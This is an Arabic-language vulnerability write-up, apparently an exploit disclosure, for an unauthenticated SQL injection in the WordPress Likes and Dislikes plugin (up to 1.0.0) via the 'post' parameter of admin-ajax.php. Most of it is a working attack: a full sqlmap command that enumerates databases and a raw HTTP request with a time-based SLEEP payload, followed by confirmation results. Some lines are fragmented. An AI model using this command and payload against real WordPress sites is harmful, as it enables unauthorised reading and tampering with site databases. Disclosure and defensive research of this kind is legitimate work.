
إضافة Likes and Dislikes لووردبريس <= 1.0.0 عرضة لحقن SQL
اكتشفها: Khaled_Alenazi (Nxploited)
نُشر في: 27 مايو، 2025
إضافة Likes and Dislikes Plugin الخاصة بـ WordPress معرضة لـ حقن SQL عبر المعامل post في جميع الإصدارات حتى 1.0.0 وما يشملها.
بسبب عدم كفاية التهريب وغياب الاستعلامات المعدّة مسبقًا، يمكن للمهاجمين غير المصادقين حقن SQL خام في استعلامات النهاية الخلفية، مما يؤدي إلى تسريب البيانات أو التلاعب بها.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
يؤكد هذا الأمر نقطة الحقن ويعدّد قواعد البيانات باستخدام تقنية قائمة على الزمن.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
تعداد SQLMap:
boolean-based blind و time-based blind SQLi.db, test, information_schema.
التحقق اليدوي باستخدام Burp Suite:
15 seconds، مما يشير إلى حقن حقيقي.
post إلى معاملات.هذا المحتوى مُقدَّم لأغراض تعليمية وبحثية فقط.
لا يُقرّ المؤلف أي نشاط خبيث أو استغلال للأنظمة دون إذن صريح.
Khaled_Alenazi (Nxploited)